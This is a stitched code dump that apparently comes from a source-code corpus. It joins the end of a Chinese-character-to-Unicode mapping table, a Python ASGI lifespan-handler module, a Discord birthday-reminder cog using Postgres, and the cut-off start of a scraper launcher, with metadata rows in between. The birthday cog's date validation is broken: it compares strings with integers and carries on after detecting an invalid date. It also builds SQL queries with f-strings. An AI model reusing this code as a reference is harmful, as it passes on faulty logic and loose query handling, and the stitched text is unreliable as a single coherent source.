0xF8B7: 0x8129, # 脩
0xF8B8: 0x50DC, # 僜
0xF8B9: 0x90A0, # 邠
0xF8BA: 0x9120, # 鄠
0xF8BB: 0x911C, # 鄜
0xF8BC: 0x52BB, # 劻
0xF8BD: 0x52F7, # 勷
0xF8BE: 0x6C67, # 汧
0xF8BF: 0x6C9A, # 沚
0xF8C0: 0x6C6D, # 汭
0xF8C1: 0x6D34, # 洴
0xF8C2: 0x6D50, # 浐
0xF8C3: 0x6D49, # 浉
0xF8C4: 0x6DA2, # 涢
0xF8C5: 0x6D65, # 浥
0xF8C6: 0x6DF4, # 淴
0xF8C7: 0x6EEA, # 滪
0xF8C8: 0x6E87, # 溇
0xF8C9: 0x6EC9, # 滉
0xF8CA: 0x6FBC, # 澼
0xF8CB: 0x6017, # 怗
0xF8CC: 0x22650, # 𢙐
0xF8CD: 0x6097, # 悗
0xF8CE: 0x60B0, # 悰
0xF8CF: 0x60D3, # 惓
0xF8D0: 0x6153, # 慓
0xF8D1: 0x5BAC, # 宬
0xF8D2: 0x5EBC, # 庼
0xF8D3: 0x95EC, # 闬
0xF8D4: 0x95FF, # 闿
0xF8D5: 0x9607, # 阇
0xF8D6: 0x9613, # 阓
0xF8D7: 0x961B, # 阛
0xF8D8: 0x631C, # 挜
0xF8D9: 0x630C, # 挌
0xF8DA: 0x63AF, # 掯
0xF8DB: 0x6412, # 搒
0xF8DC: 0x63F3, # 揳
0xF8DD: 0x6422, # 搢
0xF8DE: 0x5787, # 垇
0xF8DF: 0x57B5, # 垵
0xF8E0: 0x57BD, # 垽
0xF8E1: 0x57FC, # 埼
0xF8E2: 0x56AD, # 嚭
0xF8E3: 0x26B4C, # 𦭌
0xF8E4: 0x8313, # 茓
0xF8E5: 0x8359, # 荙
0xF8E6: 0x82F3, # 苳
0xF8E7: 0x8399, # 莙
0xF8E8: 0x44D6, # 䓖
0xF8E9: 0x841A, # 萚
0xF8EA: 0x83D1, # 菑
0xF8EB: 0x84C2, # 蓂
0xF8EC: 0x8439, # 萹
0xF8ED: 0x844E, # 葎
0xF8EE: 0x8447, # 葇
0xF8EF: 0x84DA, # 蓚
0xF8F0: 0x26D9F, # 𦶟
0xF8F1: 0x849F, # 蒟
0xF8F2: 0x84BB, # 蒻
0xF8F3: 0x850A, # 蔊
0xF8F4: 0x26ED8, # 𦻘
0xF8F5: 0x85A2, # 薢
0xF8F6: 0x85B8, # 薸
0xF8F7: 0x85E8, # 藨
0xF8F8: 0x8618, # 蘘
0xF8F9: 0x596D, # 奭
0xF8FA: 0x546F, # 呯
0xF8FB: 0x54A5, # 咥
0xF8FC: 0x551D, # 唝
0xF8FD: 0x5536, # 唶
0xF8FE: 0x556F # 啯
})
# Area F9
_update({
0xF9A1: 0x5621, # 嘡
0xF9A2: 0x20E01, # 𠸁
0xF9A3: 0x20F90, # 𠾐
0xF9A4: 0x360E, # 㘎
0xF9A5: 0x56F7, # 囷
0xF9A6: 0x5E21, # 帡
0xF9A7: 0x5E28, # 帨
0xF9A8: 0x5CA8, # 岨
0xF9A9: 0x5CE3, # 峣
0xF9AA: 0x5D5A, # 嵚
0xF9AB: 0x5D4E, # 嵎
0xF9AC: 0x5D56, # 嵖
0xF9AD: 0x5DC2, # 巂
0xF9AE: 0x8852, # 衒
0xF9AF: 0x5FAF, # 徯
0xF9B0: 0x5910, # 夐
0xF9B1: 0x7330, # 猰
0xF9B2: 0x247EF, # 𤟯
0xF9B3: 0x734F, # 獏
0xF9B4: 0x9964, # 饤
0xF9B5: 0x9973, # 饳
0xF9B6: 0x997E, # 饾
0xF9B7: 0x9982, # 馂
0xF9B8: 0x9989, # 馉
0xF9B9: 0x5C43, # 屃
0xF9BA: 0x5F36, # 弶
0xF9BB: 0x5B56, # 孖
0xF9BC: 0x59EE, # 姮
0xF9BD: 0x5AEA, # 嫪
0xF9BE: 0x7ED6, # 绖
0xF9BF: 0x7F0A, # 缊
0xF9C0: 0x7E34, # 縴
0xF9C1: 0x7F1E, # 缞
0xF9C2: 0x26221, # 𦈡
0xF9C3: 0x9A8E, # 骎
0xF9C4: 0x29A02, # 𩨂
0xF9C5: 0x9A95, # 骕
0xF9C6: 0x9AA6, # 骦
0xF9C7: 0x659D, # 斝
0xF9C8: 0x241A2, # 𤆢
0xF9C9: 0x712E, # 焮
0xF9CA: 0x7943, # 祃
0xF9CB: 0x794E, # 祎
0xF9CC: 0x7972, # 祲
0xF9CD: 0x7395, # 玕
0xF9CE: 0x73A0, # 玠
0xF9CF: 0x7399, # 玙
0xF9D0: 0x73B1, # 玱
0xF9D1: 0x73F0, # 珰
0xF9D2: 0x740E, # 琎
0xF9D3: 0x742F, # 琯
0xF9D4: 0x7432, # 琲
0xF9D5: 0x67EE, # 柮
0xF9D6: 0x6812, # 栒
0xF9D7: 0x3B74, # 㭴
0xF9D8: 0x6872, # 桲
0xF9D9: 0x68BC, # 梼
0xF9DA: 0x68B9, # 梹
0xF9DB: 0x68C1, # 棁
0xF9DC: 0x696F, # 楯
0xF9DD: 0x69A0, # 榠
0xF9DE: 0x69BE, # 榾
0xF9DF: 0x69E5, # 槥
0xF9E0: 0x6A9E, # 檞
0xF9E1: 0x69DC, # 槜
0xF9E2: 0x6B95, # 殕
0xF9E3: 0x80FE, # 胾
0xF9E4: 0x89F1, # 觱
0xF9E5: 0x74FB, # 瓻
0xF9E6: 0x7503, # 甃
0xF9E7: 0x80D4, # 胔
0xF9E8: 0x22F7E, # 𢽾
0xF9E9: 0x668D, # 暍
0xF9EA: 0x9F12, # 鼒
0xF9EB: 0x6F26, # 漦
0xF9EC: 0x8D51, # 赑
0xF9ED: 0x8D52, # 赒
0xF9EE: 0x8D57, # 赗
0xF9EF: 0x7277, # 牷
0xF9F0: 0x7297, # 犗
0xF9F1: 0x23C5D, # 𣱝
0xF9F2: 0x8090, # 肐
0xF9F3: 0x43F2, # 䏲
0xF9F4: 0x6718, # 朘
0xF9F5: 0x8158, # 腘
0xF9F6: 0x81D1, # 臑
0xF9F7: 0x7241, # 牁
0xF9F8: 0x7242, # 牂
0xF9F9: 0x7A85, # 窅
0xF9FA: 0x7A8E, # 窎
0xF9FB: 0x7ABE, # 窾
0xF9FC: 0x75A2, # 疢
0xF9FD: 0x75AD, # 疭
0xF9FE: 0x75CE # 痎
})
# Area FA
_update({
0xFAA1: 0x3FA6, # 㾦
0xFAA2: 0x7604, # 瘄
0xFAA3: 0x7606, # 瘆
0xFAA4: 0x7608, # 瘈
0xFAA5: 0x24ECA, # 𤻊
0xFAA6: 0x88C8, # 裈
0xFAA7: 0x7806, # 砆
0xFAA8: 0x7822, # 砢
0xFAA9: 0x7841, # 硁
0xFAAA: 0x7859, # 硙
0xFAAB: 0x785A, # 硚
0xFAAC: 0x7875, # 硵
0xFAAD: 0x7894, # 碔
0xFAAE: 0x40DA, # 䃚
0xFAAF: 0x790C, # 礌
0xFAB0: 0x771C, # 眜
0xFAB1: 0x251A7, # 𥆧
0xFAB2: 0x7786, # 瞆
0xFAB3: 0x778B, # 瞋
0xFAB4: 0x7564, # 畤
0xFAB5: 0x756C, # 畬
0xFAB6: 0x756F, # 畯
0xFAB7: 0x76C9, # 盉
0xFAB8: 0x76DD, # 盝
0xFAB9: 0x28C3E, # 𨰾
0xFABA: 0x497A, # 䥺
0xFABB: 0x94D3, # 铓
0xFABC: 0x94E6, # 铦
0xFABD: 0x9575, # 镵
0xFABE: 0x9520, # 锠
0xFABF: 0x9527, # 锧
0xFAC0: 0x28C4F, # 𨱏
0xFAC1: 0x9543, # 镃
0xFAC2: 0x953D, # 锽
0xFAC3: 0x28C4E, # 𨱎
0xFAC4: 0x28C54, # 𨱔
0xFAC5: 0x28C53, # 𨱓
0xFAC6: 0x9574, # 镴
0xFAC7: 0x79FE, # 秾
0xFAC8: 0x7A16, # 稖
0xFAC9: 0x415F, # 䅟
0xFACA: 0x7A5E, # 穞
0xFACB: 0x9E30, # 鸰
0xFACC: 0x9E34, # 鸴
0xFACD: 0x9E27, # 鸧
0xFACE: 0x9E2E, # 鸮
0xFACF: 0x9E52, # 鹒
0xFAD0: 0x9E53, # 鹓
0xFAD1: 0x9E59, # 鹙
0xFAD2: 0x9E56, # 鹖
0xFAD3: 0x9E61, # 鹡
0xFAD4: 0x9E6F, # 鹯
0xFAD5: 0x77DE, # 矞
0xFAD6: 0x76B6, # 皶
0xFAD7: 0x7F91, # 羑
0xFAD8: 0x7F93, # 羓
0xFAD9: 0x26393, # 𦎓
0xFADA: 0x7CA6, # 粦
0xFADB: 0x43AC, # 䎬
0xFADC: 0x8030, # 耰
0xFADD: 0x8064, # 聤
0xFADE: 0x8985, # 覅
0xFADF: 0x9892, # 颒
0xFAE0: 0x98A3, # 颣
0xFAE1: 0x8683, # 蚃
0xFAE2: 0x86B2, # 蚲
0xFAE3: 0x45AC, # 䖬
0xFAE4: 0x8705, # 蜅
0xFAE5: 0x8730, # 蜰
0xFAE6: 0x45EA, # 䗪
0xFAE7: 0x8758, # 蝘
0xFAE8: 0x7F4D, # 罍
0xFAE9: 0x7B4A, # 筊
0xFAEA: 0x41F2, # 䇲
0xFAEB: 0x7BF0, # 篰
0xFAEC: 0x7C09, # 簉
0xFAED: 0x7BEF, # 篯
0xFAEE: 0x7BF2, # 篲
0xFAEF: 0x7C20, # 簠
0xFAF0: 0x26A2D, # 𦨭
0xFAF1: 0x8C68, # 豨
0xFAF2: 0x8C6D, # 豭
0xFAF3: 0x8DF6, # 跶
0xFAF4: 0x8E04, # 踄
0xFAF5: 0x8E26, # 踦
0xFAF6: 0x8E16, # 踖
0xFAF7: 0x8E27, # 踧
0xFAF8: 0x8E53, # 蹓
0xFAF9: 0x8E50, # 蹐
0xFAFA: 0x8C90, # 貐
0xFAFB: 0x9702, # 霂
0xFAFC: 0x9F81, # 龁
0xFAFD: 0x9F82, # 龂
0xFAFE: 0x9C7D # 鱽
})
# Area FB
_update({
0xFBA1: 0x9C8A, # 鲊
0xFBA2: 0x9C80, # 鲀
0xFBA3: 0x9C8F, # 鲏
0xFBA4: 0x4C9F, # 䲟
0xFBA5: 0x9C99, # 鲙
0xFBA6: 0x9C97, # 鲗
0xFBA7: 0x29F7C, # 𩽼
0xFBA8: 0x9C96, # 鲖
0xFBA9: 0x29F7E, # 𩽾
0xFBAA: 0x29F83, # 𩾃
0xFBAB: 0x29F87, # 𩾇
0xFBAC: 0x9CC1, # 鳁
0xFBAD: 0x9CD1, # 鳑
0xFBAE: 0x9CDB, # 鳛
0xFBAF: 0x9CD2, # 鳒
0xFBB0: 0x29F8C, # 𩾌
0xFBB1: 0x9CE3, # 鳣
0xFBB2: 0x977A, # 靺
0xFBB3: 0x97AE, # 鞮
0xFBB4: 0x97A8, # 鞨
0xFBB5: 0x9B4C, # 魌
0xFBB6: 0x9B10, # 鬐
0xFBB7: 0x9B18, # 鬘
0xFBB8: 0x9E80, # 麀
0xFBB9: 0x9E95, # 麕
0xFBBA: 0x9E91, # 麑
})
"B库符号(部分非组合用字符)"
symbolsB = UnicodeMap()
symbolsB.update({
0x8940: 0x1E37, # 国际音标 = ḷ
0x8941: 0x1E43, # 国际音标 = ṃ
0x8942: 0x1E47, # 国际音标 = ṇ
0x8943: 0x015E, # 国际音标 = Ş
0x8944: 0x015F, # 国际音标 = ş
0x8945: 0x0162, # 国际音标 = Ţ
0x8946: 0x0163, # 国际音标 = ţ
0x94C0: 0x2654, # 国际象棋白格白子-王 = ♔
0x94C1: 0x2655, # 国际象棋白格白子-后 = ♕
0x94C2: 0x2656, # 国际象棋白格白子-车 = ♖
0x94C3: 0x2658, # 国际象棋白格白子-马 = ♘
0x94C4: 0x2657, # 国际象棋白格白子-相 = ♗
0x94C5: 0x2659, # 国际象棋白格白子-卒 = ♙
0x94C6: 0x265A, # 国际象棋白格黑子-王 = ♚
0x94C7: 0x265B, # 国际象棋白格黑子-后 = ♛
0x94C8: 0x265C, # 国际象棋白格黑子-车 = ♜
0x94C9: 0x265E, # 国际象棋白格黑子-马 = ♞
0x94CA: 0x265D, # 国际象棋白格黑子-相 = ♝
0x94CB: 0x265F, # 国际象棋白格黑子-卒 = ♟
0x94EC: 0x2660, # 桥牌-黑桃 = ♠
0x94ED: 0x2665, # 桥牌-红桃 = ♥
0x94EE: 0x2666, # 桥牌-方框 = ♦
0x94EF: 0x2663, # 桥牌-梅花 = ♣
0x95F1: 0x1FA67, # 中国象棋黑子-将 = 🩧
0x95F2: 0x1FA64, # 中国象棋红子-车 = 🩤
0x95F3: 0x1FA63, # 中国象棋红子-马 = 🩣
0x95F4: 0x1FA65, # 中国象棋红子-炮 = 🩥
0x95F5: 0x1FA66, # 中国象棋红子-兵 = 🩦
0x95F6: 0x1FA62, # 中国象棋红子-相 = 🩢
0x95F7: 0x1FA61, # 中国象棋红子-士 = 🩡
0x95F8: 0x1FA60, # 中国象棋红子-帅 = 🩠
0x95F9: 0x1FA6B, # 中国象棋黑子-车 = 🩫
0x95FA: 0x1FA6A, # 中国象棋黑子-马 = 🩪
0x95FB: 0x1FA6C, # 中国象棋黑子-炮 = 🩬
0x95FC: 0x1FA6D, # 中国象棋黑子-卒 = 🩭
0x95FD: 0x1FA68, # 中国象棋黑子-士 = 🩨
0x95FE: 0x1FA69, # 中国象棋黑子-象 = 🩩
0x968F: 0x1D11E, # 其他符号 = 𝄞
0x97A0: 0x4DC0, # 八卦符号 = ䷀
0x97A1: 0x4DC1, # 八卦符号 = ䷁
0x97A2: 0x4DC2, # 八卦符号 = ䷂
0x97A3: 0x4DC3, # 八卦符号 = ䷃
0x97A4: 0x4DC4, # 八卦符号 = ䷄
0x97A5: 0x4DC5, # 八卦符号 = ䷅
0x97A6: 0x4DC6, # 八卦符号 = ䷆
0x97A7: 0x4DC7, # 八卦符号 = ䷇
0x97A8: 0x4DC8, # 八卦符号 = ䷈
0x97A9: 0x4DC9, # 八卦符号 = ䷉
0x97AA: 0x4DCA, # 八卦符号 = ䷊
0x97AB: 0x4DCB, # 八卦符号 = ䷋
0x97AC: 0x4DCC, # 八卦符号 = ䷌
0x97AD: 0x4DCD, # 八卦符号 = ䷍
0x97AE: 0x4DCE, # 八卦符号 = ䷎
0x97AF: 0x4DCF, # 八卦符号 = ䷏
0x97B0: 0x4DD0, # 八卦符号 = ䷐
0x97B1: 0x4DD1, # 八卦符号 = ䷑
0x97B2: 0x4DD2, # 八卦符号 = ䷒
0x97B3: 0x4DD3, # 八卦符号 = ䷓
0x97B4: 0x4DD4, # 八卦符号 = ䷔
0x97B5: 0x4DD5, # 八卦符号 = ䷕
0x97B6: 0x4DD6, # 八卦符号 = ䷖
0x97B7: 0x4DD7, # 八卦符号 = ䷗
0x97B8: 0x4DD8, # 八卦符号 = ䷘
0x97B9: 0x4DD9, # 八卦符号 = ䷙
0x97BA: 0x4DDA, # 八卦符号 = ䷚
0x97BB: 0x4DDB, # 八卦符号 = ䷛
0x97BC: 0x4DDC, # 八卦符号 = ䷜
0x97BD: 0x4DDD, # 八卦符号 = ䷝
0x97BE: 0x4DDE, # 八卦符号 = ䷞
0x97BF: 0x4DDF, # 八卦符号 = ䷟
0x97C0: 0x4DE0, # 八卦符号 = ䷠
0x97C1: 0x4DE1, # 八卦符号 = ䷡
0x97C2: 0x4DE2, # 八卦符号 = ䷢
0x97C3: 0x4DE3, # 八卦符号 = ䷣
0x97C4: 0x4DE4, # 八卦符号 = ䷤
0x97C5: 0x4DE5, # 八卦符号 = ䷥
0x97C6: 0x4DE6, # 八卦符号 = ䷦
0x97C7: 0x4DE7, # 八卦符号 = ䷧
0x97C8: 0x4DE8, # 八卦符号 = ䷨
0x97C9: 0x4DE9, # 八卦符号 = ䷩
0x97CA: 0x4DEA, # 八卦符号 = ䷪
0x97CB: 0x4DEB, # 八卦符号 = ䷫
0x97CC: 0x4DEC, # 八卦符号 = ䷬
0x97CD: 0x4DED, # 八卦符号 = ䷭
0x97CE: 0x4DEE, # 八卦符号 = ䷮
0x97CF: 0x4DEF, # 八卦符号 = ䷯
0x97D0: 0x4DF0, # 八卦符号 = ䷰
0x97D1: 0x4DF1, # 八卦符号 = ䷱
0x97D2: 0x4DF2, # 八卦符号 = ䷲
0x97D3: 0x4DF3, # 八卦符号 = ䷳
0x97D4: 0x4DF4, # 八卦符号 = ䷴
0x97D5: 0x4DF5, # 八卦符号 = ䷵
0x97D6: 0x4DF6, # 八卦符号 = ䷶
0x97D7: 0x4DF7, # 八卦符号 = ䷷
0x97D8: 0x4DF8, # 八卦符号 = ䷸
0x97D9: 0x4DF9, # 八卦符号 = ䷹
0x97DA: 0x4DFA, # 八卦符号 = ䷺
0x97DB: 0x4DFB, # 八卦符号 = ䷻
0x97DC: 0x4DFC, # 八卦符号 = ䷼
0x97DD: 0x4DFD, # 八卦符号 = ䷽
0x97DE: 0x4DFE, # 八卦符号 = ䷾
0x97DF: 0x4DFF, # 八卦符号 = ䷿
0x97E0: 0x2630, # 八卦符号 = ☰
0x97E1: 0x2637, # 八卦符号 = ☷
0x97E2: 0x2633, # 八卦符号 = ☳
0x97E3: 0x2634, # 八卦符号 = ☴
0x97E4: 0x2635, # 八卦符号 = ☵
0x97E5: 0x2632, # 八卦符号 = ☲
0x97E6: 0x2636, # 八卦符号 = ☶
0x97E7: 0x2631, # 八卦符号 = ☱
0x97EF: 0x2A0D, # 积分主值 = ⨍
0x97F0: 0x0274, # 国际音标 = ɴ
0x97F1: 0x0280, # 国际音标 = ʀ
0x97F2: 0x97F2, # 国际音标(ɔ̃)
0x97F3: 0x97F3, # 国际音标(ɛ̃)
0xA080: 0x00B7, # 外文间隔点 = ·
0xA08E: 0x2039, # 外文左单书名号 = ‹
0xA08F: 0x203A, # 外文右单书名号 = ›
0xA090: 0x00AB, # 外文左双书名号 = «
0xA091: 0x00BB, # 外文右双书名号 = »
0xBD8A: 0x2201, # 补集 = ∁
0xBD8B: 0x2115, # 集合符号N = ℕ
0xBD8C: 0x2124, # 集合符号Z = ℤ
0xBD8D: 0x211A, # 集合符号Q = ℚ
0xBD8E: 0x211D, # 集合符号R = ℝ
0xBD8F: 0x2102, # 集合符号C = ℂ
0xBD90: 0x00AC, # 否定符号 = ¬
0xBD93: 0xBD93, # 不属于(∈ + \)
0xBD94: 0xBD94, # 不属于(∈ + |)
0xBD95: 0x220B, # 属于 = ∋
0xBD96: 0x220C, # 不属于 = ∌
0xBD97: 0xBD97, # 不属于(∋ + |)
0xBD98: 0xBD98, # 不属于(∌ + \)
0xBD99: 0x22FD, # 不属于 = ⋽
0xBD9A: 0xBD9A, # 不等于(= + \)
0xBD9B: 0x1d463 # 𝑣
})
| 28.744308 | 88 | 0.518268 |
c933cadd6174b03b61565756a1609302c0c6bfc6 | 6,176 | py | Python | moona/lifespan/handlers.py | katunilya/mona | 8f44a9e06910466afbc9b2bcfb42144dcd25ed5a | [
"MIT"
] | 2 | 2022-03-26T15:27:31.000Z | 2022-03-28T22:00:32.000Z | moona/lifespan/handlers.py | katunilya/mona | 8f44a9e06910466afbc9b2bcfb42144dcd25ed5a | [
"MIT"
] | null | null | null | moona/lifespan/handlers.py | katunilya/mona | 8f44a9e06910466afbc9b2bcfb42144dcd25ed5a | [
"MIT"
] | null | null | null | from __future__ import annotations
from copy import deepcopy
from dataclasses import dataclass
from typing import Callable, TypeVar
from pymon import Future, Pipe, cmap, creducel, hof_2, this_async
from pymon.core import returns_future
from moona.lifespan import LifespanContext
LifespanFunc = Callable[[LifespanContext], Future[LifespanContext | None]]
_LifespanHandler = Callable[
[LifespanFunc, LifespanContext], Future[LifespanContext | None]
]
def compose(h1: _LifespanHandler, h2: _LifespanHandler) -> LifespanHandler:
"""Compose 2 `LifespanHandler`s into one.
Args:
h1 (_LifespanHandler): to run first.
h2 (_LifespanHandler): to run second.
Returns:
LifespanHandler: resulting handler.
"""
def handler(
final: LifespanFunc, ctx: LifespanContext
) -> Future[LifespanContext | None]:
_h1 = hof_2(h1)
_h2 = hof_2(h2)
func = _h1(_h2(final))
return func(ctx)
return LifespanHandler(handler)
@dataclass(frozen=True, slots=True)
class LifespanHandler:
"""Abstraction over function that hander `LifespanContext`."""
_handler: Callable[[LifespanContext], Future[LifespanContext | None]]
def __call__( # noqa
self, nxt: LifespanFunc, ctx: LifespanContext
) -> Future[LifespanContext | None]:
return returns_future(self._handler)(nxt, ctx)
def __init__(self, handler: _LifespanHandler) -> None:
object.__setattr__(self, "_handler", handler)
def compose(self, h: _LifespanHandler) -> LifespanHandler:
"""Compose 2 `LifespanHandler`s into one.
Args:
h2 (_LifespanHandler): to run next.
Returns:
LifespanHandler: resulting handler.
"""
return compose(self, h)
def __rshift__(self, h: _LifespanHandler) -> LifespanHandler:
return compose(self, h)
A = TypeVar("A")
B = TypeVar("B")
C = TypeVar("C")
def handler(func: _LifespanHandler) -> LifespanHandler:
"""Decorator that converts function to LifespanHandler callable."""
return LifespanHandler(func)
def handle_func(func: LifespanFunc) -> LifespanHandler:
"""Converts `LifespanFunc` to `LifespanHandler`.
Args:
func (LifespanFunc): to convert to `LifespanHandler`.
Returns:
LifespanHandler: result.
"""
@handler
async def _handler(
nxt: LifespanFunc, ctx: LifespanContext
) -> LifespanContext | None:
match await func(ctx):
case None:
return None
case LifespanContext() as _ctx:
return await nxt(_ctx)
return _handler
def handle_func_sync(
func: Callable[[LifespanContext], LifespanContext | None]
) -> LifespanHandler:
"""Converts sync `LifespanFunc` to `LifespanHandler`.
Args:
func (Callable[[LifespanContext], LifespanContext | None]): to convert to
`LifespanHandler`.
Returns:
LifespanHandler: result.
"""
@handler
async def _handler(
nxt: LifespanFunc, ctx: LifespanContext
) -> LifespanContext | None:
match func(ctx):
case None:
return None
case LifespanContext() as _ctx:
return await nxt(_ctx)
return _handler
def __choose_reducer(f: LifespanFunc, s: LifespanFunc) -> LifespanFunc:
@returns_future
async def func(ctx: LifespanContext) -> LifespanFunc:
_ctx = deepcopy(ctx)
match await f(_ctx):
case None:
return await s(ctx)
case some:
return some
return func
def choose(handlers: list[LifespanHandler]) -> LifespanHandler:
"""Iterate though handlers till one would return some `LifespanContext`.
Args:
handlers (list[LifespanHandler]): to iterate through.
Returns:
LifespanHandler: result.
"""
@handler
async def _handler(
nxt: LifespanFunc, ctx: LifespanContext
) -> LifespanContext | None:
match handlers:
case []:
return await nxt(ctx)
case _:
func: LifespanFunc = (
Pipe(handlers)
.then(cmap(hof_2))
.then(cmap(lambda h: h(nxt)))
.then(creducel(__choose_reducer))
.finish()
)
return await func(ctx)
return _handler
def handler1(
    func: Callable[[A, LifespanFunc, LifespanContext], Future[LifespanContext | None]]
) -> Callable[[A], LifespanHandler]:
    """Decorator for LifespanHandlers with 1 additional argument.

    Makes the handler "curried": the extra argument is supplied first and a
    ready-to-use `LifespanHandler` is returned.
    """
    def wrapper(a: A) -> LifespanHandler:
        def bound(nxt: LifespanFunc, ctx: LifespanContext) -> Future[LifespanContext | None]:
            return func(a, nxt, ctx)
        return LifespanHandler(bound)
    return wrapper
def handler2(
    func: Callable[
        [A, B, LifespanFunc, LifespanContext], Future[LifespanContext | None]
    ]
) -> Callable[[A, B], LifespanHandler]:
    """Decorator for LifespanHandlers with 2 additional arguments.

    Makes the handler "curried": both extra arguments are supplied first and
    a ready-to-use `LifespanHandler` is returned.
    """
    def wrapper(a: A, b: B) -> LifespanHandler:
        def bound(nxt: LifespanFunc, ctx: LifespanContext) -> Future[LifespanContext | None]:
            return func(a, b, nxt, ctx)
        return LifespanHandler(bound)
    return wrapper
def handler3(
    func: Callable[
        [A, B, C, LifespanFunc, LifespanContext], Future[LifespanContext | None]
    ]
) -> Callable[[A, B, C], LifespanHandler]:
    """Decorator for LifespanHandlers with 3 additional arguments.

    Makes it "curried".
    """
    # DOC FIX: the docstring said "1 additional argument" (copy-paste from
    # handler1) although this variant curries three.
    def wrapper(a: A, b: B, c: C) -> LifespanHandler:
        return LifespanHandler(lambda nxt, ctx: func(a, b, c, nxt, ctx))
    return wrapper
def skip(_: LifespanContext) -> Future[None]:
    """`LifespanFunc` that skips pipeline by returning `None` instead of context.
    Args:
        _ (LifespanContext): ctx we don't care of.
    Returns:
        Future[None]: result.
    """
    # An already-resolved Future carrying None -- the short-circuit marker
    # that `handle_func`-style handlers interpret as "stop the pipeline".
    return Future(this_async(None))
def end(ctx: LifespanContext) -> Future[LifespanContext]:
    """`LifespanFunc` that finishes the pipeline of request handling.
    Args:
        ctx (LifespanContext): to end.
    Returns:
        Future[LifespanContext]: ended ctx.
    """
    # Wrap the context in an already-resolved Future, terminating the chain
    # with a successful result.
    return Future(this_async(ctx))
| 25.841004 | 86 | 0.629858 |
c9340f2d3c1db26d4655357d65aa1d342c92a30f | 4,246 | py | Python | bot/cogs/birthday/birthday.py | Qtopia-Team/luci | 9b7f1966050910d50f04cbd9733d1c77ffbb8cba | [
"MIT"
] | 5 | 2021-04-27T10:50:54.000Z | 2021-08-02T09:11:56.000Z | bot/cogs/birthday/birthday.py | Qtopia-Team/luci | 9b7f1966050910d50f04cbd9733d1c77ffbb8cba | [
"MIT"
] | 2 | 2021-06-17T14:53:13.000Z | 2021-06-19T02:14:36.000Z | bot/cogs/birthday/birthday.py | luciferchase/luci | 91e30520cfc60177b9916d3f3d41678f590ecdfc | [
"MIT"
] | 4 | 2021-06-11T12:02:42.000Z | 2021-06-30T16:56:46.000Z | import discord
from discord.ext import commands
import json
import os
import psycopg2
import pytz
class Birthday(commands.Cog):
"""Never forget birthday of your friends"""
	def __init__(self):
		"""Open the Postgres connection and make sure the ``bday`` table exists."""
		# Set up database
		DATABASE_URL = os.environ["DATABASE_URL"]
		self.dbcon = psycopg2.connect(DATABASE_URL, sslmode = "require")
		self.cursor = self.dbcon.cursor()
		# Make a table if not already made
		query = """CREATE TABLE IF NOT EXISTS bday(
			id BIGINT NOT NULL PRIMARY KEY,
			guild_id BIGINT NOT NULL,
			bday_date INT NOT NULL,
			bday_month INT NOT NULL,
			tz TEXT NOT NULL
		)"""
		self.cursor.execute(query)
		self.dbcon.commit()
	@commands.guild_only()
	@commands.group(invoke_without_command = True)
	async def bday(self, ctx):
		"""To set your bday type `luci bday set`
		If you want to edit a bday type `luci bday edit`"""
		# Group root: the subcommands do the real work, so invoking a bare
		# `luci bday` intentionally does nothing beyond showing the help text.
		pass
@bday.command(name = "set")
async def setbday(self, ctx, member: discord.Member, date, tz = "UTC"):
"""Usage: luci bday set @Lucifer Chase 27/02 kolkata
If you don't care about the timezone thing leave it blank"""
date = date.split("/")
for i in range(2):
if (date[i][0] == 0):
date[i] = date[i][1]
correct_date = True
if (date[0] > 31 or date[0] < 0 or date[1] > 12 or date[0] < 0):
correct_date = False
if (date[0] > 30 and date[1] not in [1, 3, 5, 7, 8, 10, 12]):
correct_date = False
elif (date[1] == 2 and date[0] > 27):
correct_date = False
if (not correct_date):
await ctx.send("Bruh! My expectation from you was low but holy shit!")
bday_date, bday_month = date
if (tz != "UTC"):
list_of_timezones = list(pytz.all_timezones)
for i in range(len(list_of_timezones)):
if (tz.title() in list_of_timezones[i]):
tz = list_of_timezones[i]
break
else:
await ctx.send("Uh oh! Timezone not found 👀")
await ctx.send("You can check list of timezones using `luci timezones [continent name]`")
return
try:
self.cursor.execute("DELETE FROM bday WHERE id = {}".format(member.id))
self.dbcon.commit()
except:
pass
query = f"""INSERT INTO bday VALUES
({member.id}, {member.guild.id}, {bday_date}, {bday_month}, '{tz}')"""
try:
self.cursor.execute(query)
self.dbcon.commit()
except Exception as error:
await ctx.send(f"```css\n{error}```")
await ctx.send(str("Are you doing everything correctly?" +
"Might want to check usage `luci help bday set`" +
"Or if the problem persists ping `@Lucifer Chase`"))
else:
embed = discord.Embed(title = "Success! <a:nacho:839499460874862655>", color = 0x00FFFF)
embed.add_field(name = "Member", value = member.nick)
embed.add_field(name = "Date", value = "/".join(date))
embed.add_field(name = "Timezone", value = tz)
await ctx.send(embed = embed)
@bday.command(name = "delete")
async def bdaydelete(self, ctx):
self.cursor.execute("DELETE FROM bday WHERE id = {}".format(ctx.author.id))
self.dbcon.commit()
	@commands.command()
	@commands.is_owner()
	async def showbday(self, ctx):
		"""Owner-only debug dump of the whole bday table."""
		self.cursor.execute("SELECT * FROM bday")
		data = self.cursor.fetchall()
		# Dump the table in two messages -- presumably to stay under Discord's
		# message length limit; note the second half is sent first (confirm
		# the intended order).
		await ctx.send("```css\n{}```".format(json.dumps(data[len(data)//2:], indent = 1)))
		await ctx.send("```css\n{}```".format(json.dumps(data[:len(data)//2], indent = 1)))
		# Scan for ids that appear more than once (duplicate rows).
		not_redundant = []
		redundant = []
		for i in data:
			if (i[0] not in not_redundant):
				not_redundant.append(i[0])
			else:
				redundant.append(i[0])
		await ctx.send("```css\n{}```".format(json.dumps(redundant, indent = 2))) | 35.090909 | 105 | 0.544277 |
c934c6f917f8d18513144569e61a6ad4e232777a | 651 | py | Python | apps/main/proc_scraper.py | suenklerhaw/seoeffekt | 0a31fdfa1a7246da37e37bf53c03d94c5f13f095 | [
"MIT"
] | 1 | 2022-02-15T14:03:10.000Z | 2022-02-15T14:03:10.000Z | apps/main/proc_scraper.py | suenklerhaw/seoeffekt | 0a31fdfa1a7246da37e37bf53c03d94c5f13f095 | [
"MIT"
] | null | null | null | apps/main/proc_scraper.py | suenklerhaw/seoeffekt | 0a31fdfa1a7246da37e37bf53c03d94c5f13f095 | [
"MIT"
] | null | null | null | #sub processes to scrape using the normal Google scraper
#include libs
import sys
sys.path.insert(0, '..')
from include import *
def save_sources():
	"""Run job_save_sources.py as a blocking subprocess."""
	call(["python3", "job_save_sources.py"])
def scraper():
	"""Run job_scraper.py as a blocking subprocess."""
	call(["python3", "job_scraper.py"])
def reset_scraper():
	"""Run job_reset_scraper.py as a blocking subprocess."""
